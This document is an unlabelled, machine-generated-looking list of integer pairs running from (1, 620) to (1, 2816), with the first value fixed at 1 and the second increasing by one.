(1, 620), (1, 621), (1, 622), (1, 623), (1, 624), (1, 625), (1, 626), (1, 627), (1, 628), (1, 629), (1, 630), (1, 631), (1, 632), (1, 633), (1, 634), (1, 635), (1, 636), (1, 637), (1, 638), (1, 639), (1, 640), (1, 641), (1, 642), (1, 643), (1, 644), (1, 645), (1, 646), (1, 647), (1, 648), (1, 649), (1, 650), (1, 651), (1, 652), (1, 653), (1, 654), (1, 655), (1, 656), (1, 657), (1, 658), (1, 659), (1, 660), (1, 661), (1, 662), (1, 663), (1, 664), (1, 665), (1, 666), (1, 667), (1, 668), (1, 669), (1, 670), (1, 671), (1, 672), (1, 673), (1, 674), (1, 675), (1, 676), (1, 677), (1, 678), (1, 679), (1, 680), (1, 681), (1, 682), (1, 683), (1, 684), (1, 685), (1, 686), (1, 687), (1, 688), (1, 689), (1, 690), (1, 691), (1, 692), (1, 693), (1, 694), (1, 695), (1, 696), (1, 697), (1, 698), (1, 699), (1, 700), (1, 701), (1, 702), (1, 703), (1, 704), (1, 705), (1, 706), (1, 707), (1, 708), (1, 709), (1, 710), (1, 711), (1, 712), (1, 713), (1, 714), (1, 715), (1, 716), (1, 717), (1, 718), (1, 719), (1, 720), (1, 721), (1, 722), (1, 723), (1, 724), (1, 725), (1, 726), (1, 727), (1, 728), (1, 729), (1, 730), (1, 731), (1, 732), (1, 733), (1, 734), (1, 735), (1, 736), (1, 737), (1, 738), (1, 739), (1, 740), (1, 741), (1, 742), (1, 743), (1, 744), (1, 745), (1, 746), (1, 747), (1, 748), (1, 749), (1, 750), (1, 751), (1, 752), (1, 753), (1, 754), (1, 755), (1, 756), (1, 757), (1, 758), (1, 759), (1, 760), (1, 761), (1, 762), (1, 763), (1, 764), (1, 765), (1, 766), (1, 767), (1, 768), (1, 769), (1, 770), (1, 771), (1, 772), (1, 773), (1, 774), (1, 775), (1, 776), (1, 777), (1, 778), (1, 779), (1, 780), (1, 781), (1, 782), (1, 783), (1, 784), (1, 785), (1, 786), (1, 787), (1, 788), (1, 789), (1, 790), (1, 791), (1, 792), (1, 793), (1, 794), (1, 795), (1, 796), (1, 797), (1, 798), (1, 799), (1, 800), (1, 801), (1, 802), (1, 803), (1, 804), (1, 805), (1, 806), (1, 807), (1, 808), (1, 809), (1, 810), (1, 811), (1, 812), (1, 813), (1, 814), (1, 815), (1, 816), (1, 817), (1, 818), (1, 819), (1, 820), (1, 821), (1, 822), (1, 823), (1, 824), (1, 825), (1, 826), (1, 827), (1, 828), (1, 829), (1, 830), (1, 831), (1, 832), (1, 833), (1, 834), (1, 835), (1, 836), (1, 837), (1, 838), (1, 839), (1, 840), (1, 841), (1, 842), (1, 843), (1, 844), (1, 845), (1, 846), (1, 847), (1, 848), (1, 849), (1, 850), (1, 851), (1, 852), (1, 853), (1, 854), (1, 855), (1, 856), (1, 857), (1, 858), (1, 859), (1, 860), (1, 861), (1, 862), (1, 863), (1, 864), (1, 865), (1, 866), (1, 867), (1, 868), (1, 869), (1, 870), (1, 871), (1, 872), (1, 873), (1, 874), (1, 875), (1, 876), (1, 877), (1, 878), (1, 879), (1, 880), (1, 881), (1, 882), (1, 883), (1, 884), (1, 885), (1, 886), (1, 887), (1, 888), (1, 889), (1, 890), (1, 891), (1, 892), (1, 893), (1, 894), (1, 895), (1, 896), (1, 897), (1, 898), (1, 899), (1, 900), (1, 901), (1, 902), (1, 903), (1, 904), (1, 905), (1, 906), (1, 907), (1, 908), (1, 909), (1, 910), (1, 911), (1, 912), (1, 913), (1, 914), (1, 915), (1, 916), (1, 917), (1, 918), (1, 919), (1, 920), (1, 921), (1, 922), (1, 923), (1, 924), (1, 925), (1, 926), (1, 927), (1, 928), (1, 929), (1, 930), (1, 931), (1, 932), (1, 933), (1, 934), (1, 935), (1, 936), (1, 937), (1, 938), (1, 939), (1, 940), (1, 941), (1, 942), (1, 943), (1, 944), (1, 945), (1, 946), (1, 947), (1, 948), (1, 949), (1, 950), (1, 951), (1, 952), (1, 953), (1, 954), (1, 955), (1, 956), (1, 957), (1, 958), (1, 959), (1, 960), (1, 961), (1, 962), (1, 963), (1, 964), (1, 965), (1, 966), (1, 967), (1, 968), (1, 969), (1, 970), (1, 971), (1, 972), (1, 973), (1, 974), (1, 975), (1, 976), (1, 977), (1, 978), (1, 979), (1, 980), (1, 981), (1, 982), (1, 983), (1, 984), (1, 985), (1, 986), (1, 987), (1, 988), (1, 989), (1, 990), (1, 991), (1, 992), (1, 993), (1, 994), (1, 995), (1, 996), (1, 997), (1, 998), (1, 999), (1, 1000), (1, 1001), (1, 1002), (1, 1003), (1, 1004), (1, 1005), (1, 1006), (1, 1007), (1, 1008), (1, 1009), (1, 1010), (1, 1011), (1, 1012), (1, 1013), (1, 1014), (1, 1015), (1, 1016), (1, 1017), (1, 1018), (1, 1019), (1, 1020), (1, 1021), (1, 1022), (1, 1023), (1, 1024), (1, 1025), (1, 1026), (1, 1027), (1, 1028), (1, 1029), (1, 1030), (1, 1031), (1, 1032), (1, 1033), (1, 1034), (1, 1035), (1, 1036), (1, 1037), (1, 1038), (1, 1039), (1, 1040), (1, 1041), (1, 1042), (1, 1043), (1, 1044), (1, 1045), (1, 1046), (1, 1047), (1, 1048), (1, 1049), (1, 1050), (1, 1051), (1, 1052), (1, 1053), (1, 1054), (1, 1055), (1, 1056), (1, 1057), (1, 1058), (1, 1059), (1, 1060), (1, 1061), (1, 1062), (1, 1063), (1, 1064), (1, 1065), (1, 1066), (1, 1067), (1, 1068), (1, 1069), (1, 1070), (1, 1071), (1, 1072), (1, 1073), (1, 1074), (1, 1075), (1, 1076), (1, 1077), (1, 1078), (1, 1079), (1, 1080), (1, 1081), (1, 1082), (1, 1083), (1, 1084), (1, 1085), (1, 1086), (1, 1087), (1, 1088), (1, 1089), (1, 1090), (1, 1091), (1, 1092), (1, 1093), (1, 1094), (1, 1095), (1, 1096), (1, 1097), (1, 1098), (1, 1099), (1, 1100), (1, 1101), (1, 1102), (1, 1103), (1, 1104), (1, 1105), (1, 1106), (1, 1107), (1, 1108), (1, 1109), (1, 1110), (1, 1111), (1, 1112), (1, 1113), (1, 1114), (1, 1115), (1, 1116), (1, 1117), (1, 1118), (1, 1119), (1, 1120), (1, 1121), (1, 1122), (1, 1123), (1, 1124), (1, 1125), (1, 1126), (1, 1127), (1, 1128), (1, 1129), (1, 1130), (1, 1131), (1, 1132), (1, 1133), (1, 1134), (1, 1135), (1, 1136), (1, 1137), (1, 1138), (1, 1139), (1, 1140), (1, 1141), (1, 1142), (1, 1143), (1, 1144), (1, 1145), (1, 1146), (1, 1147), (1, 1148), (1, 1149), (1, 1150), (1, 1151), (1, 1152), (1, 1153), (1, 1154), (1, 1155), (1, 1156), (1, 1157), (1, 1158), (1, 1159), (1, 1160), (1, 1161), (1, 1162), (1, 1163), (1, 1164), (1, 1165), (1, 1166), (1, 1167), (1, 1168), (1, 1169), (1, 1170), (1, 1171), (1, 1172), (1, 1173), (1, 1174), (1, 1175), (1, 1176), (1, 1177), (1, 1178), (1, 1179), (1, 1180), (1, 1181), (1, 1182), (1, 1183), (1, 1184), (1, 1185), (1, 1186), (1, 1187), (1, 1188), (1, 1189), (1, 1190), (1, 1191), (1, 1192), (1, 1193), (1, 1194), (1, 1195), (1, 1196), (1, 1197), (1, 1198), (1, 1199), (1, 1200), (1, 1201), (1, 1202), (1, 1203), (1, 1204), (1, 1205), (1, 1206), (1, 1207), (1, 1208), (1, 1209), (1, 1210), (1, 1211), (1, 1212), (1, 1213), (1, 1214), (1, 1215), (1, 1216), (1, 1217), (1, 1218), (1, 1219), (1, 1220), (1, 1221), (1, 1222), (1, 1223), (1, 1224), (1, 1225), (1, 1226), (1, 1227), (1, 1228), (1, 1229), (1, 1230), (1, 1231), (1, 1232), (1, 1233), (1, 1234), (1, 1235), (1, 1236), (1, 1237), (1, 1238), (1, 1239), (1, 1240), (1, 1241), (1, 1242), (1, 1243), (1, 1244), (1, 1245), (1, 1246), (1, 1247), (1, 1248), (1, 1249), (1, 1250), (1, 1251), (1, 1252), (1, 1253), (1, 1254), (1, 1255), (1, 1256), (1, 1257), (1, 1258), (1, 1259), (1, 1260), (1, 1261), (1, 1262), (1, 1263), (1, 1264), (1, 1265), (1, 1266), (1, 1267), (1, 1268), (1, 1269), (1, 1270), (1, 1271), (1, 1272), (1, 1273), (1, 1274), (1, 1275), (1, 1276), (1, 1277), (1, 1278), (1, 1279), (1, 1280), (1, 1281), (1, 1282), (1, 1283), (1, 1284), (1, 1285), (1, 1286), (1, 1287), (1, 1288), (1, 1289), (1, 1290), (1, 1291), (1, 1292), (1, 1293), (1, 1294), (1, 1295), (1, 1296), (1, 1297), (1, 1298), (1, 1299), (1, 1300), (1, 1301), (1, 1302), (1, 1303), (1, 1304), (1, 1305), (1, 1306), (1, 1307), (1, 1308), (1, 1309), (1, 1310), (1, 1311), (1, 1312), (1, 1313), (1, 1314), (1, 1315), (1, 1316), (1, 1317), (1, 1318), (1, 1319), (1, 1320), (1, 1321), (1, 1322), (1, 1323), (1, 1324), (1, 1325), (1, 1326), (1, 1327), (1, 1328), (1, 1329), (1, 1330), (1, 1331), (1, 1332), (1, 1333), (1, 1334), (1, 1335), (1, 1336), (1, 1337), (1, 1338), (1, 1339), (1, 1340), (1, 1341), (1, 1342), (1, 1343), (1, 1344), (1, 1345), (1, 1346), (1, 1347), (1, 1348), (1, 1349), (1, 1350), (1, 1351), (1, 1352), (1, 1353), (1, 1354), (1, 1355), (1, 1356), (1, 1357), (1, 1358), (1, 1359), (1, 1360), (1, 1361), (1, 1362), (1, 1363), (1, 1364), (1, 1365), (1, 1366), (1, 1367), (1, 1368), (1, 1369), (1, 1370), (1, 1371), (1, 1372), (1, 1373), (1, 1374), (1, 1375), (1, 1376), (1, 1377), (1, 1378), (1, 1379), (1, 1380), (1, 1381), (1, 1382), (1, 1383), (1, 1384), (1, 1385), (1, 1386), (1, 1387), (1, 1388), (1, 1389), (1, 1390), (1, 1391), (1, 1392), (1, 1393), (1, 1394), (1, 1395), (1, 1396), (1, 1397), (1, 1398), (1, 1399), (1, 1400), (1, 1401), (1, 1402), (1, 1403), (1, 1404), (1, 1405), (1, 1406), (1, 1407), (1, 1408), (1, 1409), (1, 1410), (1, 1411), (1, 1412), (1, 1413), (1, 1414), (1, 1415), (1, 1416), (1, 1417), (1, 1418), (1, 1419), (1, 1420), (1, 1421), (1, 1422), (1, 1423), (1, 1424), (1, 1425), (1, 1426), (1, 1427), (1, 1428), (1, 1429), (1, 1430), (1, 1431), (1, 1432), (1, 1433), (1, 1434), (1, 1435), (1, 1436), (1, 1437), (1, 1438), (1, 1439), (1, 1440), (1, 1441), (1, 1442), (1, 1443), (1, 1444), (1, 1445), (1, 1446), (1, 1447), (1, 1448), (1, 1449), (1, 1450), (1, 1451), (1, 1452), (1, 1453), (1, 1454), (1, 1455), (1, 1456), (1, 1457), (1, 1458), (1, 1459), (1, 1460), (1, 1461), (1, 1462), (1, 1463), (1, 1464), (1, 1465), (1, 1466), (1, 1467), (1, 1468), (1, 1469), (1, 1470), (1, 1471), (1, 1472), (1, 1473), (1, 1474), (1, 1475), (1, 1476), (1, 1477), (1, 1478), (1, 1479), (1, 1480), (1, 1481), (1, 1482), (1, 1483), (1, 1484), (1, 1485), (1, 1486), (1, 1487), (1, 1488), (1, 1489), (1, 1490), (1, 1491), (1, 1492), (1, 1493), (1, 1494), (1, 1495), (1, 1496), (1, 1497), (1, 1498), (1, 1499), (1, 1500), (1, 1501), (1, 1502), (1, 1503), (1, 1504), (1, 1505), (1, 1506), (1, 1507), (1, 1508), (1, 1509), (1, 1510), (1, 1511), (1, 1512), (1, 1513), (1, 1514), (1, 1515), (1, 1516), (1, 1517), (1, 1518), (1, 1519), (1, 1520), (1, 1521), (1, 1522), (1, 1523), (1, 1524), (1, 1525), (1, 1526), (1, 1527), (1, 1528), (1, 1529), (1, 1530), (1, 1531), (1, 1532), (1, 1533), (1, 1534), (1, 1535), (1, 1536), (1, 1537), (1, 1538), (1, 1539), (1, 1540), (1, 1541), (1, 1542), (1, 1543), (1, 1544), (1, 1545), (1, 1546), (1, 1547), (1, 1548), (1, 1549), (1, 1550), (1, 1551), (1, 1552), (1, 1553), (1, 1554), (1, 1555), (1, 1556), (1, 1557), (1, 1558), (1, 1559), (1, 1560), (1, 1561), (1, 1562), (1, 1563), (1, 1564), (1, 1565), (1, 1566), (1, 1567), (1, 1568), (1, 1569), (1, 1570), (1, 1571), (1, 1572), (1, 1573), (1, 1574), (1, 1575), (1, 1576), (1, 1577), (1, 1578), (1, 1579), (1, 1580), (1, 1581), (1, 1582), (1, 1583), (1, 1584), (1, 1585), (1, 1586), (1, 1587), (1, 1588), (1, 1589), (1, 1590), (1, 1591), (1, 1592), (1, 1593), (1, 1594), (1, 1595), (1, 1596), (1, 1597), (1, 1598), (1, 1599), (1, 1600), (1, 1601), (1, 1602), (1, 1603), (1, 1604), (1, 1605), (1, 1606), (1, 1607), (1, 1608), (1, 1609), (1, 1610), (1, 1611), (1, 1612), (1, 1613), (1, 1614), (1, 1615), (1, 1616), (1, 1617), (1, 1618), (1, 1619), (1, 1620), (1, 1621), (1, 1622), (1, 1623), (1, 1624), (1, 1625), (1, 1626), (1, 1627), (1, 1628), (1, 1629), (1, 1630), (1, 1631), (1, 1632), (1, 1633), (1, 1634), (1, 1635), (1, 1636), (1, 1637), (1, 1638), (1, 1639), (1, 1640), (1, 1641), (1, 1642), (1, 1643), (1, 1644), (1, 1645), (1, 1646), (1, 1647), (1, 1648), (1, 1649), (1, 1650), (1, 1651), (1, 1652), (1, 1653), (1, 1654), (1, 1655), (1, 1656), (1, 1657), (1, 1658), (1, 1659), (1, 1660), (1, 1661), (1, 1662), (1, 1663), (1, 1664), (1, 1665), (1, 1666), (1, 1667), (1, 1668), (1, 1669), (1, 1670), (1, 1671), (1, 1672), (1, 1673), (1, 1674), (1, 1675), (1, 1676), (1, 1677), (1, 1678), (1, 1679), (1, 1680), (1, 1681), (1, 1682), (1, 1683), (1, 1684), (1, 1685), (1, 1686), (1, 1687), (1, 1688), (1, 1689), (1, 1690), (1, 1691), (1, 1692), (1, 1693), (1, 1694), (1, 1695), (1, 1696), (1, 1697), (1, 1698), (1, 1699), (1, 1700), (1, 1701), (1, 1702), (1, 1703), (1, 1704), (1, 1705), (1, 1706), (1, 1707), (1, 1708), (1, 1709), (1, 1710), (1, 1711), (1, 1712), (1, 1713), (1, 1714), (1, 1715), (1, 1716), (1, 1717), (1, 1718), (1, 1719), (1, 1720), (1, 1721), (1, 1722), (1, 1723), (1, 1724), (1, 1725), (1, 1726), (1, 1727), (1, 1728), (1, 1729), (1, 1730), (1, 1731), (1, 1732), (1, 1733), (1, 1734), (1, 1735), (1, 1736), (1, 1737), (1, 1738), (1, 1739), (1, 1740), (1, 1741), (1, 1742), (1, 1743), (1, 1744), (1, 1745), (1, 1746), (1, 1747), (1, 1748), (1, 1749), (1, 1750), (1, 1751), (1, 1752), (1, 1753), (1, 1754), (1, 1755), (1, 1756), (1, 1757), (1, 1758), (1, 1759), (1, 1760), (1, 1761), (1, 1762), (1, 1763), (1, 1764), (1, 1765), (1, 1766), (1, 1767), (1, 1768), (1, 1769), (1, 1770), (1, 1771), (1, 1772), (1, 1773), (1, 1774), (1, 1775), (1, 1776), (1, 1777), (1, 1778), (1, 1779), (1, 1780), (1, 1781), (1, 1782), (1, 1783), (1, 1784), (1, 1785), (1, 1786), (1, 1787), (1, 1788), (1, 1789), (1, 1790), (1, 1791), (1, 1792), (1, 1793), (1, 1794), (1, 1795), (1, 1796), (1, 1797), (1, 1798), (1, 1799), (1, 1800), (1, 1801), (1, 1802), (1, 1803), (1, 1804), (1, 1805), (1, 1806), (1, 1807), (1, 1808), (1, 1809), (1, 1810), (1, 1811), (1, 1812), (1, 1813), (1, 1814), (1, 1815), (1, 1816), (1, 1817), (1, 1818), (1, 1819), (1, 1820), (1, 1821), (1, 1822), (1, 1823), (1, 1824), (1, 1825), (1, 1826), (1, 1827), (1, 1828), (1, 1829), (1, 1830), (1, 1831), (1, 1832), (1, 1833), (1, 1834), (1, 1835), (1, 1836), (1, 1837), (1, 1838), (1, 1839), (1, 1840), (1, 1841), (1, 1842), (1, 1843), (1, 1844), (1, 1845), (1, 1846), (1, 1847), (1, 1848), (1, 1849), (1, 1850), (1, 1851), (1, 1852), (1, 1853), (1, 1854), (1, 1855), (1, 1856), (1, 1857), (1, 1858), (1, 1859), (1, 1860), (1, 1861), (1, 1862), (1, 1863), (1, 1864), (1, 1865), (1, 1866), (1, 1867), (1, 1868), (1, 1869), (1, 1870), (1, 1871), (1, 1872), (1, 1873), (1, 1874), (1, 1875), (1, 1876), (1, 1877), (1, 1878), (1, 1879), (1, 1880), (1, 1881), (1, 1882), (1, 1883), (1, 1884), (1, 1885), (1, 1886), (1, 1887), (1, 1888), (1, 1889), (1, 1890), (1, 1891), (1, 1892), (1, 1893), (1, 1894), (1, 1895), (1, 1896), (1, 1897), (1, 1898), (1, 1899), (1, 1900), (1, 1901), (1, 1902), (1, 1903), (1, 1904), (1, 1905), (1, 1906), (1, 1907), (1, 1908), (1, 1909), (1, 1910), (1, 1911), (1, 1912), (1, 1913), (1, 1914), (1, 1915), (1, 1916), (1, 1917), (1, 1918), (1, 1919), (1, 1920), (1, 1921), (1, 1922), (1, 1923), (1, 1924), (1, 1925), (1, 1926), (1, 1927), (1, 1928), (1, 1929), (1, 1930), (1, 1931), (1, 1932), (1, 1933), (1, 1934), (1, 1935), (1, 1936), (1, 1937), (1, 1938), (1, 1939), (1, 1940), (1, 1941), (1, 1942), (1, 1943), (1, 1944), (1, 1945), (1, 1946), (1, 1947), (1, 1948), (1, 1949), (1, 1950), (1, 1951), (1, 1952), (1, 1953), (1, 1954), (1, 1955), (1, 1956), (1, 1957), (1, 1958), (1, 1959), (1, 1960), (1, 1961), (1, 1962), (1, 1963), (1, 1964), (1, 1965), (1, 1966), (1, 1967), (1, 1968), (1, 1969), (1, 1970), (1, 1971), (1, 1972), (1, 1973), (1, 1974), (1, 1975), (1, 1976), (1, 1977), (1, 1978), (1, 1979), (1, 1980), (1, 1981), (1, 1982), (1, 1983), (1, 1984), (1, 1985), (1, 1986), (1, 1987), (1, 1988), (1, 1989), (1, 1990), (1, 1991), (1, 1992), (1, 1993), (1, 1994), (1, 1995), (1, 1996), (1, 1997), (1, 1998), (1, 1999), (1, 2000), (1, 2001), (1, 2002), (1, 2003), (1, 2004), (1, 2005), (1, 2006), (1, 2007), (1, 2008), (1, 2009), (1, 2010), (1, 2011), (1, 2012), (1, 2013), (1, 2014), (1, 2015), (1, 2016), (1, 2017), (1, 2018), (1, 2019), (1, 2020), (1, 2021), (1, 2022), (1, 2023), (1, 2024), (1, 2025), (1, 2026), (1, 2027), (1, 2028), (1, 2029), (1, 2030), (1, 2031), (1, 2032), (1, 2033), (1, 2034), (1, 2035), (1, 2036), (1, 2037), (1, 2038), (1, 2039), (1, 2040), (1, 2041), (1, 2042), (1, 2043), (1, 2044), (1, 2045), (1, 2046), (1, 2047), (1, 2048), (1, 2049), (1, 2050), (1, 2051), (1, 2052), (1, 2053), (1, 2054), (1, 2055), (1, 2056), (1, 2057), (1, 2058), (1, 2059), (1, 2060), (1, 2061), (1, 2062), (1, 2063), (1, 2064), (1, 2065), (1, 2066), (1, 2067), (1, 2068), (1, 2069), (1, 2070), (1, 2071), (1, 2072), (1, 2073), (1, 2074), (1, 2075), (1, 2076), (1, 2077), (1, 2078), (1, 2079), (1, 2080), (1, 2081), (1, 2082), (1, 2083), (1, 2084), (1, 2085), (1, 2086), (1, 2087), (1, 2088), (1, 2089), (1, 2090), (1, 2091), (1, 2092), (1, 2093), (1, 2094), (1, 2095), (1, 2096), (1, 2097), (1, 2098), (1, 2099), (1, 2100), (1, 2101), (1, 2102), (1, 2103), (1, 2104), (1, 2105), (1, 2106), (1, 2107), (1, 2108), (1, 2109), (1, 2110), (1, 2111), (1, 2112), (1, 2113), (1, 2114), (1, 2115), (1, 2116), (1, 2117), (1, 2118), (1, 2119), (1, 2120), (1, 2121), (1, 2122), (1, 2123), (1, 2124), (1, 2125), (1, 2126), (1, 2127), (1, 2128), (1, 2129), (1, 2130), (1, 2131), (1, 2132), (1, 2133), (1, 2134), (1, 2135), (1, 2136), (1, 2137), (1, 2138), (1, 2139), (1, 2140), (1, 2141), (1, 2142), (1, 2143), (1, 2144), (1, 2145), (1, 2146), (1, 2147), (1, 2148), (1, 2149), (1, 2150), (1, 2151), (1, 2152), (1, 2153), (1, 2154), (1, 2155), (1, 2156), (1, 2157), (1, 2158), (1, 2159), (1, 2160), (1, 2161), (1, 2162), (1, 2163), (1, 2164), (1, 2165), (1, 2166), (1, 2167), (1, 2168), (1, 2169), (1, 2170), (1, 2171), (1, 2172), (1, 2173), (1, 2174), (1, 2175), (1, 2176), (1, 2177), (1, 2178), (1, 2179), (1, 2180), (1, 2181), (1, 2182), (1, 2183), (1, 2184), (1, 2185), (1, 2186), (1, 2187), (1, 2188), (1, 2189), (1, 2190), (1, 2191), (1, 2192), (1, 2193), (1, 2194), (1, 2195), (1, 2196), (1, 2197), (1, 2198), (1, 2199), (1, 2200), (1, 2201), (1, 2202), (1, 2203), (1, 2204), (1, 2205), (1, 2206), (1, 2207), (1, 2208), (1, 2209), (1, 2210), (1, 2211), (1, 2212), (1, 2213), (1, 2214), (1, 2215), (1, 2216), (1, 2217), (1, 2218), (1, 2219), (1, 2220), (1, 2221), (1, 2222), (1, 2223), (1, 2224), (1, 2225), (1, 2226), (1, 2227), (1, 2228), (1, 2229), (1, 2230), (1, 2231), (1, 2232), (1, 2233), (1, 2234), (1, 2235), (1, 2236), (1, 2237), (1, 2238), (1, 2239), (1, 2240), (1, 2241), (1, 2242), (1, 2243), (1, 2244), (1, 2245), (1, 2246), (1, 2247), (1, 2248), (1, 2249), (1, 2250), (1, 2251), (1, 2252), (1, 2253), (1, 2254), (1, 2255), (1, 2256), (1, 2257), (1, 2258), (1, 2259), (1, 2260), (1, 2261), (1, 2262), (1, 2263), (1, 2264), (1, 2265), (1, 2266), (1, 2267), (1, 2268), (1, 2269), (1, 2270), (1, 2271), (1, 2272), (1, 2273), (1, 2274), (1, 2275), (1, 2276), (1, 2277), (1, 2278), (1, 2279), (1, 2280), (1, 2281), (1, 2282), (1, 2283), (1, 2284), (1, 2285), (1, 2286), (1, 2287), (1, 2288), (1, 2289), (1, 2290), (1, 2291), (1, 2292), (1, 2293), (1, 2294), (1, 2295), (1, 2296), (1, 2297), (1, 2298), (1, 2299), (1, 2300), (1, 2301), (1, 2302), (1, 2303), (1, 2304), (1, 2305), (1, 2306), (1, 2307), (1, 2308), (1, 2309), (1, 2310), (1, 2311), (1, 2312), (1, 2313), (1, 2314), (1, 2315), (1, 2316), (1, 2317), (1, 2318), (1, 2319), (1, 2320), (1, 2321), (1, 2322), (1, 2323), (1, 2324), (1, 2325), (1, 2326), (1, 2327), (1, 2328), (1, 2329), (1, 2330), (1, 2331), (1, 2332), (1, 2333), (1, 2334), (1, 2335), (1, 2336), (1, 2337), (1, 2338), (1, 2339), (1, 2340), (1, 2341), (1, 2342), (1, 2343), (1, 2344), (1, 2345), (1, 2346), (1, 2347), (1, 2348), (1, 2349), (1, 2350), (1, 2351), (1, 2352), (1, 2353), (1, 2354), (1, 2355), (1, 2356), (1, 2357), (1, 2358), (1, 2359), (1, 2360), (1, 2361), (1, 2362), (1, 2363), (1, 2364), (1, 2365), (1, 2366), (1, 2367), (1, 2368), (1, 2369), (1, 2370), (1, 2371), (1, 2372), (1, 2373), (1, 2374), (1, 2375), (1, 2376), (1, 2377), (1, 2378), (1, 2379), (1, 2380), (1, 2381), (1, 2382), (1, 2383), (1, 2384), (1, 2385), (1, 2386), (1, 2387), (1, 2388), (1, 2389), (1, 2390), (1, 2391), (1, 2392), (1, 2393), (1, 2394), (1, 2395), (1, 2396), (1, 2397), (1, 2398), (1, 2399), (1, 2400), (1, 2401), (1, 2402), (1, 2403), (1, 2404), (1, 2405), (1, 2406), (1, 2407), (1, 2408), (1, 2409), (1, 2410), (1, 2411), (1, 2412), (1, 2413), (1, 2414), (1, 2415), (1, 2416), (1, 2417), (1, 2418), (1, 2419), (1, 2420), (1, 2421), (1, 2422), (1, 2423), (1, 2424), (1, 2425), (1, 2426), (1, 2427), (1, 2428), (1, 2429), (1, 2430), (1, 2431), (1, 2432), (1, 2433), (1, 2434), (1, 2435), (1, 2436), (1, 2437), (1, 2438), (1, 2439), (1, 2440), (1, 2441), (1, 2442), (1, 2443), (1, 2444), (1, 2445), (1, 2446), (1, 2447), (1, 2448), (1, 2449), (1, 2450), (1, 2451), (1, 2452), (1, 2453), (1, 2454), (1, 2455), (1, 2456), (1, 2457), (1, 2458), (1, 2459), (1, 2460), (1, 2461), (1, 2462), (1, 2463), (1, 2464), (1, 2465), (1, 2466), (1, 2467), (1, 2468), (1, 2469), (1, 2470), (1, 2471), (1, 2472), (1, 2473), (1, 2474), (1, 2475), (1, 2476), (1, 2477), (1, 2478), (1, 2479), (1, 2480), (1, 2481), (1, 2482), (1, 2483), (1, 2484), (1, 2485), (1, 2486), (1, 2487), (1, 2488), (1, 2489), (1, 2490), (1, 2491), (1, 2492), (1, 2493), (1, 2494), (1, 2495), (1, 2496), (1, 2497), (1, 2498), (1, 2499), (1, 2500), (1, 2501), (1, 2502), (1, 2503), (1, 2504), (1, 2505), (1, 2506), (1, 2507), (1, 2508), (1, 2509), (1, 2510), (1, 2511), (1, 2512), (1, 2513), (1, 2514), (1, 2515), (1, 2516), (1, 2517), (1, 2518), (1, 2519), (1, 2520), (1, 2521), (1, 2522), (1, 2523), (1, 2524), (1, 2525), (1, 2526), (1, 2527), (1, 2528), (1, 2529), (1, 2530), (1, 2531), (1, 2532), (1, 2533), (1, 2534), (1, 2535), (1, 2536), (1, 2537), (1, 2538), (1, 2539), (1, 2540), (1, 2541), (1, 2542), (1, 2543), (1, 2544), (1, 2545), (1, 2546), (1, 2547), (1, 2548), (1, 2549), (1, 2550), (1, 2551), (1, 2552), (1, 2553), (1, 2554), (1, 2555), (1, 2556), (1, 2557), (1, 2558), (1, 2559), (1, 2560), (1, 2561), (1, 2562), (1, 2563), (1, 2564), (1, 2565), (1, 2566), (1, 2567), (1, 2568), (1, 2569), (1, 2570), (1, 2571), (1, 2572), (1, 2573), (1, 2574), (1, 2575), (1, 2576), (1, 2577), (1, 2578), (1, 2579), (1, 2580), (1, 2581), (1, 2582), (1, 2583), (1, 2584), (1, 2585), (1, 2586), (1, 2587), (1, 2588), (1, 2589), (1, 2590), (1, 2591), (1, 2592), (1, 2593), (1, 2594), (1, 2595), (1, 2596), (1, 2597), (1, 2598), (1, 2599), (1, 2600), (1, 2601), (1, 2602), (1, 2603), (1, 2604), (1, 2605), (1, 2606), (1, 2607), (1, 2608), (1, 2609), (1, 2610), (1, 2611), (1, 2612), (1, 2613), (1, 2614), (1, 2615), (1, 2616), (1, 2617), (1, 2618), (1, 2619), (1, 2620), (1, 2621), (1, 2622), (1, 2623), (1, 2624), (1, 2625), (1, 2626), (1, 2627), (1, 2628), (1, 2629), (1, 2630), (1, 2631), (1, 2632), (1, 2633), (1, 2634), (1, 2635), (1, 2636), (1, 2637), (1, 2638), (1, 2639), (1, 2640), (1, 2641), (1, 2642), (1, 2643), (1, 2644), (1, 2645), (1, 2646), (1, 2647), (1, 2648), (1, 2649), (1, 2650), (1, 2651), (1, 2652), (1, 2653), (1, 2654), (1, 2655), (1, 2656), (1, 2657), (1, 2658), (1, 2659), (1, 2660), (1, 2661), (1, 2662), (1, 2663), (1, 2664), (1, 2665), (1, 2666), (1, 2667), (1, 2668), (1, 2669), (1, 2670), (1, 2671), (1, 2672), (1, 2673), (1, 2674), (1, 2675), (1, 2676), (1, 2677), (1, 2678), (1, 2679), (1, 2680), (1, 2681), (1, 2682), (1, 2683), (1, 2684), (1, 2685), (1, 2686), (1, 2687), (1, 2688), (1, 2689), (1, 2690), (1, 2691), (1, 2692), (1, 2693), (1, 2694), (1, 2695), (1, 2696), (1, 2697), (1, 2698), (1, 2699), (1, 2700), (1, 2701), (1, 2702), (1, 2703), (1, 2704), (1, 2705), (1, 2706), (1, 2707), (1, 2708), (1, 2709), (1, 2710), (1, 2711), (1, 2712), (1, 2713), (1, 2714), (1, 2715), (1, 2716), (1, 2717), (1, 2718), (1, 2719), (1, 2720), (1, 2721), (1, 2722), (1, 2723), (1, 2724), (1, 2725), (1, 2726), (1, 2727), (1, 2728), (1, 2729), (1, 2730), (1, 2731), (1, 2732), (1, 2733), (1, 2734), (1, 2735), (1, 2736), (1, 2737), (1, 2738), (1, 2739), (1, 2740), (1, 2741), (1, 2742), (1, 2743), (1, 2744), (1, 2745), (1, 2746), (1, 2747), (1, 2748), (1, 2749), (1, 2750), (1, 2751), (1, 2752), (1, 2753), (1, 2754), (1, 2755), (1, 2756), (1, 2757), (1, 2758), (1, 2759), (1, 2760), (1, 2761), (1, 2762), (1, 2763), (1, 2764), (1, 2765), (1, 2766), (1, 2767), (1, 2768), (1, 2769), (1, 2770), (1, 2771), (1, 2772), (1, 2773), (1, 2774), (1, 2775), (1, 2776), (1, 2777), (1, 2778), (1, 2779), (1, 2780), (1, 2781), (1, 2782), (1, 2783), (1, 2784), (1, 2785), (1, 2786), (1, 2787), (1, 2788), (1, 2789), (1, 2790), (1, 2791), (1, 2792), (1, 2793), (1, 2794), (1, 2795), (1, 2796), (1, 2797), (1, 2798), (1, 2799), (1, 2800), (1, 2801), (1, 2802), (1, 2803), (1, 2804), (1, 2805), (1, 2806), (1, 2807), (1, 2808), (1, 2809), (1, 2810), (1, 2811), (1, 2812), (1, 2813), (1, 2814), (1, 2815), (1, 2816), 